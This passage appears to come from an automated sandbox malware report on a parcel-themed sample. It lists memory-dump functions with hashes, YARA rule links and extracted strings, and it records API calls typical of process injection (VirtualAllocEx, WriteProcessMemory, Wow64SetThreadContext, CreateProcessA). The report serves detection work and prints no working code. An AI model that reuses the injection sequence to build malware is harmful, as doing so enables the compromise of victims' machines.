Opcode ID: 68bbcff2d5a322d173ad71f76fb08d3bd6013e076f98201339a475c9b7070fd0
Instruction ID: e3607700beffb4f16f792eec3f1e8aa9a8efa01af8ff8e011f18cb4eb515df23
Opcode Fuzzy Hash: 68bbcff2d5a322d173ad71f76fb08d3bd6013e076f98201339a475c9b7070fd0
Instruction Fuzzy Hash: 5852B5B4A005288FCB64DF28CD84B9ABBB6FB89305F1081D9E50DA7355DB30AE85DF51

Function 065CD758 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c99ba9594d265197377770bc9d938e226fa9b11915f4c1cf649e7aeda2ec1556
Instruction ID: 9289042a8fb935ad70afc056a198afebbca2e132ad817740b469c7bc864ad97a
Opcode Fuzzy Hash: c99ba9594d265197377770bc9d938e226fa9b11915f4c1cf649e7aeda2ec1556
Instruction Fuzzy Hash: F9F13B74E00218CFEB94DFA4D854BADBBF2FF49314F1081AAD409AB295D7789985CF41

Function 065CD768 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849404f40aea6de419d443bb1f7c3df481550020c6fc9481afaf6cd5ab2f9a46
Instruction ID: 1ca069ac7ce594483f28eb9d4ab23525ab5a99523e583b1da73264cd14ea7d85
Opcode Fuzzy Hash: 849404f40aea6de419d443bb1f7c3df481550020c6fc9481afaf6cd5ab2f9a46
Instruction Fuzzy Hash: B2F12A74E00218CFEB94DFA4D894BADBBF2FF49314F1081AAD409AB295D7789985CF41

Function 06775A15 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e53f6833823323129ae6159908a240bba1f6f2f8ada343b8a38674571d2909
Instruction ID: 638393382f3082de16e8de9052389f357c27148cb4180d0e286dc3ec7b94b7c1
Opcode Fuzzy Hash: 78e53f6833823323129ae6159908a240bba1f6f2f8ada343b8a38674571d2909
Instruction Fuzzy Hash: B3B1607180A3A59FDB03DB28DC606EA7FB1AF46200F1581D7D084DB1A3DA385D89CBA5

Function 065E57E7 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f4980101d6682b1181086cbc7f6f0e51f553f61598a966ad4108c89541e514e
Instruction ID: bdf43490a384cc6825821aef9641c706a03ccda07913e42afc9b12292a11dcd5
Opcode Fuzzy Hash: 3f4980101d6682b1181086cbc7f6f0e51f553f61598a966ad4108c89541e514e
Instruction Fuzzy Hash: 9ED1F3B4D05218CFDB58CFA6C9447DDBBF1BB89305F2480A9D909AB345E7759A88CF80

Function 06778072 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5877a812b2dcb5176dd55656db4447eae301f14cd7314e1e00ea18f8f996ef4a
Instruction ID: e90e03c971539b7044fd6da59e1f313d92c54d3466cd6b17c7d98359d870585f
Opcode Fuzzy Hash: 5877a812b2dcb5176dd55656db4447eae301f14cd7314e1e00ea18f8f996ef4a
Instruction Fuzzy Hash: B2710674E01208DFCB84DFA9D854AAEBBF6FF89300F10C029E519AB355DB34A941CB91

Function 06778080 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbb163114fe4c022e1794ce8b49d867615c607b767a4353cd903b7f38d64f38
Instruction ID: 843e486fa51089c6a1d0e8540e1fb008a649e6b55ee82cda1b8cb7a917364ee7
Opcode Fuzzy Hash: 7dbb163114fe4c022e1794ce8b49d867615c607b767a4353cd903b7f38d64f38
Instruction Fuzzy Hash: 6871D874E11208DFDB84DF99D854AAEBBF6FF89300F10C029E519AB355DB34A941CB91

Function 065E0006 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968d938e443b6e987065a8b1e5b80e42f373183a0dc87637703dbcf56a1bb233
Instruction ID: 63b3b282e051097c5e0c157de7f368b54807481ba7d6e541127bdba48adbb63b
Opcode Fuzzy Hash: 968d938e443b6e987065a8b1e5b80e42f373183a0dc87637703dbcf56a1bb233
Instruction Fuzzy Hash: 84610871E05A588FEB19DF6BDC4069ABBF3AFC9300F04C1AAD408AA255DB744A85CF50

Function 06775B78 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e3a9f0349c49e723862f16f0e10a291f23364b11302fa3ac75a5657fa68a1b
Instruction ID: e11e1677c7529c6e603805409c52de30355f473f94ba56bc7a93eae20271baaa
Opcode Fuzzy Hash: f7e3a9f0349c49e723862f16f0e10a291f23364b11302fa3ac75a5657fa68a1b
Instruction Fuzzy Hash: D0512871E00619CFDB94DF69C8507ADBBB2BF88300F50C1AAE509A7250EB746A85CF90

Function 027B4556 Relevance: 5.0, Strings: 4, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$eq, xrefs: 027B4756
TJjq, xrefs: 027B472A
$eq, xrefs: 027B476C
jjjjjj, xrefs: 027B46B4

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: TJjq$jjjjjj$$eq$$eq
API String ID: 0-588169492
Opcode ID: b4cc89a04a138e811164520d18c82af9122687264dede67a17a62c993ebfce6f
Instruction ID: 9d1d3e4a743e98da952c459ef625d214b3f6a362072ba12ec3affd15fbe181bb
Opcode Fuzzy Hash: b4cc89a04a138e811164520d18c82af9122687264dede67a17a62c993ebfce6f
Instruction Fuzzy Hash: A5B0925640E791CF8B434A6588E41A17F20AEA2044359C1E6C48A0F047C0248A8BE335

Function 065C0470 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'eq, xrefs: 065C068A
4'eq, xrefs: 065C0769
4'eq, xrefs: 065C07E9

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$4'eq
API String ID: 0-3023824364
Opcode ID: 0ad8a1c7fed1ea02e66fd257185a8968e22cc257e5739a2193f40d464b0dc126
Instruction ID: 99b090826ad19c4ff047ee5061996ccab833a18048f87f322130c3cba40ed110
Opcode Fuzzy Hash: 0ad8a1c7fed1ea02e66fd257185a8968e22cc257e5739a2193f40d464b0dc126
Instruction Fuzzy Hash: 7FF1BA35A00219DFCB88DFA4D994A9DB7B2FF89310F518158E506AB3A5DB71EC46CF80

Function 065C4A60 Relevance: 4.1, Strings: 3, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(iq, xrefs: 065C4BB5
Hiq, xrefs: 065C4BE1
(iq, xrefs: 065C4B89

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (iq$(iq$Hiq
API String ID: 0-2457769603
Opcode ID: eedf4390d58d7efcfe9301809a3c0bdfe573209a9bdd49c18ff586e3141d4279
Instruction ID: b3027fb85f03b4c84803e0d8f724900d9e2d8464cd1555d9fd90921261a8275f
Opcode Fuzzy Hash: eedf4390d58d7efcfe9301809a3c0bdfe573209a9bdd49c18ff586e3141d4279
Instruction Fuzzy Hash: E9E13134A00209DFCB44EFA4D89499EBBB2FF89310F148569E506AB365DF30ED46CB91

Function 065514C0 Relevance: 4.0, Strings: 2, Instructions: 1491COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065525F9
4'eq, xrefs: 06552609

Memory Dump Source

Source File: 00000000.00000002.2115797149.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6550000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq
API String ID: 0-907361030
Opcode ID: b0840f4877f0214e533d86f5731c949788d56ec31d58e83813cc69546ff263f5
Instruction ID: 0fedc9c0dcd865247f47f8ea12d76633b167fc89bad8635677794143c56b86d8
Opcode Fuzzy Hash: b0840f4877f0214e533d86f5731c949788d56ec31d58e83813cc69546ff263f5
Instruction Fuzzy Hash: 4ED2B170D093989FDB56CBA4CC68BAE7FB5BF46300F15449BE600AB2A2C7345945CFA1

Function 06552970 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'eq, xrefs: 06552E06
4'eq, xrefs: 06552E16

Memory Dump Source

Source File: 00000000.00000002.2115797149.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6550000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq
API String ID: 0-907361030
Opcode ID: 919d41de759e67149b4c145b8cb42fafe1f8c182217e12a0ad2db10abf6739ce
Instruction ID: afa4bb54545216ec1d1a6662c707aeaf3bd98654c01e755a92cb3cd8e6a133e0
Opcode Fuzzy Hash: 919d41de759e67149b4c145b8cb42fafe1f8c182217e12a0ad2db10abf6739ce
Instruction Fuzzy Hash: 11F1A874D01218DFDB94DFE4E4A86ADBBB2FF49315F20842AE916A7350DB345A85CF40

Function 06552648 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'eq, xrefs: 06552938
4'eq, xrefs: 06552928

Memory Dump Source

Source File: 00000000.00000002.2115797149.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6550000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq
API String ID: 0-907361030
Opcode ID: c1b76db0cfc0ce98178de1614de63a584c5a736ba4974e068b2ffa84136fd8d7
Instruction ID: e193826d3d0fd84fca5a7baa172573509ce2b475fd197b30e9cc75f23c9f2af0
Opcode Fuzzy Hash: c1b76db0cfc0ce98178de1614de63a584c5a736ba4974e068b2ffa84136fd8d7
Instruction Fuzzy Hash: 3FA1F474E01219CFDF98DFA4D4586ADBBB2FF88301F10842AD912A7354CB349A86CF91

Function 0655147A Relevance: 2.3, Strings: 1, Instructions: 1003COMMON

Download Yara Rule

Strings

4'eq, xrefs: 065525F9

Memory Dump Source

Source File: 00000000.00000002.2115797149.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6550000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: eb054129550b6fddabe77342d9205a02e17dbe7233200b6f4602ffa8aada3200
Instruction ID: 655b88b4f28abd21427455c1084bf372ca43adfd98d3d7f58f34687766714d44
Opcode Fuzzy Hash: eb054129550b6fddabe77342d9205a02e17dbe7233200b6f4602ffa8aada3200
Instruction Fuzzy Hash: 2582617490E384AFD72787758C68B9A3F75AF03300F1A45DBE6449B2E3C6785948CB62

Function 065C1358 Relevance: 1.9, Strings: 1, Instructions: 677
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,iq, xrefs: 065C16D3

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: ,iq
API String ID: 0-1887606315
Opcode ID: f41954409125a2ca5cea0d7c764472faa6559de60f9636fb1cabc555cf0e0e20
Instruction ID: 74e6eb697acde48e81a12ffa94f4fe399c9f9716c09c7e53c8f873109e9c3e2a
Opcode Fuzzy Hash: f41954409125a2ca5cea0d7c764472faa6559de60f9636fb1cabc555cf0e0e20
Instruction Fuzzy Hash: 8D520AB5A006288FDB64DF68C995BDDBBF2BF88300F1581D9E509A7351DA309E80CF61

Function 027BE0B8 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(_eq, xrefs: 027BE345

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID: (_eq
API String ID: 0-480964360
Opcode ID: 6bcabb9ab6af514e00496f6979566cc18844ec2f1f1c7d4d80f6830b4d1abc77
Instruction ID: 7a571a8c558f2dcfcd5b309e4e2872df238a62c983997a853cd59c8c9d5bbd07
Opcode Fuzzy Hash: 6bcabb9ab6af514e00496f6979566cc18844ec2f1f1c7d4d80f6830b4d1abc77
Instruction Fuzzy Hash: F4228E75A002149FCB45DFA8D894BADBBB2FF88304F548459E906EB3A1DB75ED80CB50

Function 06778928 Relevance: 1.7, APIs: 1, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c3713b09d35b137fc4f2457277ba0e51539685f50be5964804de7d3f5a50bc
Instruction ID: 8479f6f2c7d2300a5f9828ca574474e49daad7ad32cba3bbc648f1ab4bca5143
Opcode Fuzzy Hash: 29c3713b09d35b137fc4f2457277ba0e51539685f50be5964804de7d3f5a50bc
Instruction Fuzzy Hash: 75817A71D003499FDF50CFA8C8897EEBBF1AF48314F158529E818EB294DB749885CB92

Function 0677896C Relevance: 1.7, APIs: 1, Instructions: 210processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06778B52

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7a0a2f7a7a068d5655f9113d2079dcf831972e746ecb123b326143b8ee44addd
Instruction ID: 13dad6bec6239260d804b354d4ebf6a009f926da435b45b56ec6140165da10ef
Opcode Fuzzy Hash: 7a0a2f7a7a068d5655f9113d2079dcf831972e746ecb123b326143b8ee44addd
Instruction Fuzzy Hash: 868148B1D002599FDF50CFA9C8897EEBBF1EF48310F158529E818A7294DB749881CB92

Function 06778978 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06778B52

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 18155e530f40f482e260c725cf53c318a9575bf3854f1c81ed2863aea30bb00b
Instruction ID: 80c3b42de9ff07783520985163421751ac88b47460378468b831710babccd949
Opcode Fuzzy Hash: 18155e530f40f482e260c725cf53c318a9575bf3854f1c81ed2863aea30bb00b
Instruction Fuzzy Hash: 898127B1D002599FDF50CFA9C8897EEBBF1FF48314F158529E818A7294DB749885CB82

Function 0677AC26 Relevance: 1.6, APIs: 1, Instructions: 149fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 0677AD75

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: b14c2ba4844bbc23f6e410e9f7779c189ee65009d2419544851365af5bc81f02
Instruction ID: d22bb7fadfb11e15af7bf36717be9ee41b4c38111d69c2ee5fca30864dab5b6f
Opcode Fuzzy Hash: b14c2ba4844bbc23f6e410e9f7779c189ee65009d2419544851365af5bc81f02
Instruction Fuzzy Hash: 68519C71D003599FEF54CFA9C9457AEBBF2EF48311F248629E819E7284DB748881CB91

Function 0677AC30 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 0677AD75

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 3a91ec185fd9ac8c66e412108468ea5d7b0e2c341ce380bed15a838176cfaf49
Instruction ID: 4840269770fd227718bdee7e9eadd9bfee52ebd3cee7440befc1d431e48ea8a3
Opcode Fuzzy Hash: 3a91ec185fd9ac8c66e412108468ea5d7b0e2c341ce380bed15a838176cfaf49
Instruction Fuzzy Hash: 40519D70D003599FEF54CFA9C8457AEBBF2EF48311F248629D815E7288DB749841CB81

Function 06779190 Relevance: 1.6, APIs: 1, Instructions: 88injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06779228

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c7b87363cedbd1a3bc319771126107eec7c83cdaf47ebd8e638867a14fd51f2e
Instruction ID: d471ba3a0ee8705468e4ef729ce76eb75af359c7198fc53b44da261fd6dc8a13
Opcode Fuzzy Hash: c7b87363cedbd1a3bc319771126107eec7c83cdaf47ebd8e638867a14fd51f2e
Instruction Fuzzy Hash: 5F31CB719043499FCB01CFA9C884BEEBFF4FF48320F14842AE918A7252D7789944CBA1

Function 06778C2A Relevance: 1.6, APIs: 1, Instructions: 86threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06778CF6

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: feff13baf598978fadd808b715937e25819a60700271e1a2224c69cbb8c9e380
Instruction ID: 0f3eb8b84fe31c21c7fccfe56a7935d7c57cae6ea5fbf6ef2ce9f282a05bc1a1
Opcode Fuzzy Hash: feff13baf598978fadd808b715937e25819a60700271e1a2224c69cbb8c9e380
Instruction Fuzzy Hash: 6C31BC719003098FDB50DFA8D8887EEBBF4EF88324F14852AD518A7251CB389985CFA1

Function 06779148 Relevance: 1.6, APIs: 1, Instructions: 82injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06779228

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e6cdb66a6ee0613bab9410cdcc24021dad14133ec35821474f54f77e0d92b2b4
Instruction ID: e63f0562dc5d5c0bbebabfffab521ce489eef675b16dcfa8ef3c7811860dbfb5
Opcode Fuzzy Hash: e6cdb66a6ee0613bab9410cdcc24021dad14133ec35821474f54f77e0d92b2b4
Instruction Fuzzy Hash: 0E3178719013098FCF40DFA8D8847EEBBF5FF48310F14842AEA18AB251CB799954DBA4

Function 06778C70 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06778CF6

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 44336b67f3860f95470140370dd86d6f2d09db08b41e906d58eb2465f2c7c586
Instruction ID: 64e089f5f0bceeb23047d2646b18729ad782a2b190159000e97182e3b5ed8920
Opcode Fuzzy Hash: 44336b67f3860f95470140370dd86d6f2d09db08b41e906d58eb2465f2c7c586
Instruction Fuzzy Hash: E8215971D003099FDB10DFAAC889BEEBBF4EF48320F54852AD558A7241CB789945CFA5

Function 0677904A Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06779106

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 162d19534aa844364d265293ed8899f0eb94735623a84b3f743b0aaa1412d220
Instruction ID: 5e8dcd54ef41e80b9d2a49581e180f461025d7ace7f01cf0d7f9f5e68660d310
Opcode Fuzzy Hash: 162d19534aa844364d265293ed8899f0eb94735623a84b3f743b0aaa1412d220
Instruction Fuzzy Hash: 6D21BE319012098FCF50DFA8DC447EEBBF9EF88310F14841AE619A7260CB795954DFA1

Function 06779198 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06779228

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3c50b5867556dad5e7e8f42dab0032a90bce585f946a2c699e8b2ef5ad9c7e65
Instruction ID: 38af5a98c5816340af6d9949f9431b28beda796a666884dce31bc4d61bcf2649
Opcode Fuzzy Hash: 3c50b5867556dad5e7e8f42dab0032a90bce585f946a2c699e8b2ef5ad9c7e65
Instruction Fuzzy Hash: 752127759003499FCF10DFA9C985BEEBBF5FF48320F10842AE918A7241D7789954DBA0

Function 06778C78 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06778CF6

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e56769f6bc8faf513f56317e9b778c0cdd1ad5f3fa94b5b3733f5e61f125463f
Instruction ID: dfa2e651dbb03f2bc087af92e50c59beaf8b2428f58f4aecd4138b9eaedc3cfe
Opcode Fuzzy Hash: e56769f6bc8faf513f56317e9b778c0cdd1ad5f3fa94b5b3733f5e61f125463f
Instruction Fuzzy Hash: A9214771D003098FDB10DFAAC8857EEBBF4EF88320F14842AD419A7241DB789945CFA5

Function 06779582 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 067795FC

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 04e77ab80b40f299c70b5e1596dd8108124827adce6bc2fd1939f1760aa77261
Instruction ID: 3b5d7337f68ae2719966ecd3179945127f9a2eddb81e47783a43d509e8bdcb40
Opcode Fuzzy Hash: 04e77ab80b40f299c70b5e1596dd8108124827adce6bc2fd1939f1760aa77261
Instruction Fuzzy Hash: 65214971C002099FDB10DFAAC981BEEFBF5EF88320F14842AD519A7240DB789945DFA1

Function 06779588 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 067795FC

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 878e1f7771d2caf0f6295f63184c3ecfc7a2a00378e7c6d43440f0c4a81b356b
Instruction ID: 47bc6e0cb186dab55e412ad6e028b000649b273225a5be98e2e1c2a7cfb65aa2
Opcode Fuzzy Hash: 878e1f7771d2caf0f6295f63184c3ecfc7a2a00378e7c6d43440f0c4a81b356b
Instruction Fuzzy Hash: AE213671C002098FDB10DFAAC985BEEFBF5EF88320F54842AD519A7240DB789945DFA1

Function 06779092 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06779106

Memory Dump Source

Source File: 00000000.00000002.2116804438.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8f1d7fb88b5c01a9cb8e5ecf46be199258e7f819563ae8c8bfad6d34b3bb5dc4
Instruction ID: 8bf222b1da39f011cb6c09a6eee646bf72ecc0f5e763bada9131e9ab268062c3
Opcode Fuzzy Hash: 8f1d7fb88b5c01a9cb8e5ecf46be199258e7f819563ae8c8bfad6d34b3bb5dc4
Instruction Fuzzy Hash: D5116D759002099FDF10DFA9C845AEFBFF9EF88320F248419E515A7250CB759954CFA0

Function 067AD418 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 067AD48C

Memory Dump Source

